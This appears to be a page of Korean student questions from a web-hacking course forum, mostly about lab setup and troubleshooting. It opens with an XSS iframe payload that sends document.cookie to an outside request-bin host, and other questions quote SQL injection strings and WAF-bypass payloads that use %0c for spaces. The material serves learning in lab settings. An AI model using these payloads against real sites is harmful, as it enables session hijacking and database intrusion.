<iframe srcdoc = "<&#x73;cript>fetch('https://mamibjs.request.dreamhack.games/?'+document.cookie)</&#x73;cript>">서버 주소는 드림핵 툴즈 이용했습니다. 스크립트를 위처럼 작성하고 activate admin bot 버튼 누르면 전송이 와야 되는데 안 옵니다. 제가 직접 작성한 글을 클릭해서 하는건 전송이 또 되는데 어드민 봇이 안되는 거 같습니다. 추가로 xss_WAF_3으로도 해봤는데 이것같은 경우는 정상 작동했습니다.

강의 영상을 보면서 따라하기에는 터미널 화면이 너무 작네요. 그냥 눈으로만 볼 수 있을 뿐...따라하면서 배우기는 어려운 강의라고 생각됩니다.

수업 자료가 진도율에 포함이 되지 않습니다.그래서 강의를 모두 수강하였지만 10% 부족으로 나옵니다.수강 완료 후 받을 수 있는 수료증 발급이 필요합니다.

실습 중 백슬래시를 세개 사용하여 로그인 시도 중 로그인이 가능한 것을 확인하였습니다. '\'의 경우 이스케이프 문자로 뒤에 오는 값을 문자열로 표현하기 위함으로 알고 있습니다. 그렇다면 '\\'로 사용하면 문자열로서의 "\"가 될것인데,id 값에 '\\\'를 넣을 경우id='\\\'가 됨으로서 최종 id의 값은 문자열로서의 "\'"가 되는 것으로 생각이 되는데 어떻게 로그인이 가능한 것일까요?

압축파일을 해제했는데,강사님처럼 파이썬 파일(.py)는 없네요.pwntools도 깔았는데...어떻게 하면 되는지 알려주시면 감사하겠습니다~

강의처럼‘ union select 'test','test',null,null,'test',null,null,null,null#라고 치고 검색버튼을 누르면 아무런 결과값이 안 나오는데, cmd창에서 쿼리문 작성시 결과값이 잘 나옵니다. 이유가 뭔지 궁금합니다! ㅜㅜ세팅은 똑같이 따라했습니다

GNS3에 IPS, WAF 구현했는데 해당 기능 써도 될까요?혹시 공부에 지장이 있을까요?

ID 입력란에 페이로드(admin' AND 1=1 -- ) 삽입 시 정상적으로 플래그가 도출되었으나 ID에 'admin', PW 입력란에 페이로드(1' or 1=1 -- ) 삽입 시 플래그가 도출되지 않았습니다. 두번째의 경우ID='admin'AND PW=' 1' or 1=1 -- ' 로 ID가 'admin'이고 PW가 쿼리로 인해 항상 참인데 왜 플래그가 도출되지 않는지 모르겠습니다.

수업을 들으면서 민감한 기능을 사용에 주의해야 한다고 하셨는데 그러면 만약 실무진단 도중에 Xss의 위험을 발견하고 세션하이재킹을 시도해보고 싶다면 독단적인 판단이 아니라 담당자와의 이야기를 한 후에 진행해야하나요? 아니면 이런 세세한 부분은 이야기하지 않고 후에 보고서로 제출하는 건가요?

맥북이라 htdocs말고 맥북에 해당하는 폴더에 넣고 localhost/폴더명(insecure_website)/치는데 파일들의 리스트가 뜹니다Index of /insecure_websiteParent Directoryaction.phpauth.phpcommon.phpcss/dom.phpdownload.phperror.phphtmlpurifier/index.phpjoin.phpjs/list.phplogin.phplogout.phpmodify.phpmypage.phppingcheck.phpquery.txtupload/view.phpwithdrawal.phpwrite.phpxmlparser.phpindex.php로 들어갈 경우 아래와 같은 것이 화면에 출력되어,location.href='index.php?page=error&value={$page}';"; } ?>short_open_tag => On => On 이걸로 설정바꿨는데도 계속 똑같습니다.

.exe파일이 열리지 않습니다

dvwa 파일이 사이트에 없습니다

레드라쿤 가이드북 애플리케이션에서 초대를 받았습니다!메일에는 아래 내용만 있고 코드가 없습니다. 레드라쿤 가이드북레드라쿤 가이드북 애플리케이션에 가입한 기록이 있습니다.아래 버튼을 클릭하여 계정 비밀번호를 설정하고 접근 권한을 얻으세요:비밀번호 설정비밀번호 설정를 클릭할 수 없을 때는 웹 브라우저에서 다음 링크로 접속할 수 있습니다.https://guides.redraccoon.kr/register/invite/ztoviU9MYpbRfBIEhamCAOt5그래서 /verify 코드 입력을 진행할 수 없습니다.

해당 내용을 추가했는데도 페이지가 이쁘게 나오지 않고 그대로 나오는데 왜 이러는지 알려주시면 감사하겠습니다!ㅠㅠ

가이드북 접근 신청을 하는것만으로도 AWS추가비용이 발생한다는건가요 아니면 가이드북신청해놓고 공부할때 사용할때 비용이 발생하기 시작한다는것인가요?

zenmap 설치 과정에서 이렇게 결과가 나오는데 어떻게 해결해야 될지 알려주시면 감사하겠습니다...ㅠㅠ 칼리 버전은 2025.2 입니다

이런 식으로도 결과가 나올 수 있나요? 칼리 버전은 2025.2 입니다.

첨부파일(압축파일)을 다운 받았는데 비밀번호가 있어서 압축을 못 풀고 있는데 비밀번호가 무엇인가요?

- 학습 관련 질문을 남겨주세요. 상세히 작성하면 더 좋아요! - 먼저 유사한 질문이 있었는지 검색해보세요. - 서로 예의를 지키며 존중하는 문화를 만들어가요. - 잠깐! 인프런 서비스 운영 관련 문의는 1:1 문의하기를 이용해주세요. 워크스테이션과 kali 리눅스를 다운로드했는데, 워크스테이션-file-open 하면 파일이 없다고 뜹니다.

%0c, %0b 등WAF 3 문제처럼 || 1=1 limit 1,1 #와 같은 페이로드를 작성하고 공백을 우회할려고 foom feed의 유니코드 숫자값인 %0c를 이용해서 ||%0c1=1%0climit%0c1,1%0c#처럼 쓰는거는 get 형식으로 보내는 경우처럼 URL에 포함되어서 보낼때만 가능한건가요?vertical tab강사님께서 WAF3 문제풀이에서 foomfeed 유니코드 복사하셔서 || 1=1 limit 1,1 # 문장에서 공백 대신에 사용하시는 걸 봤는데 vertical tab (0x0b)의 유니코드를 복사해서 사용하면 안 되던데 왜 그런지 궁금합니다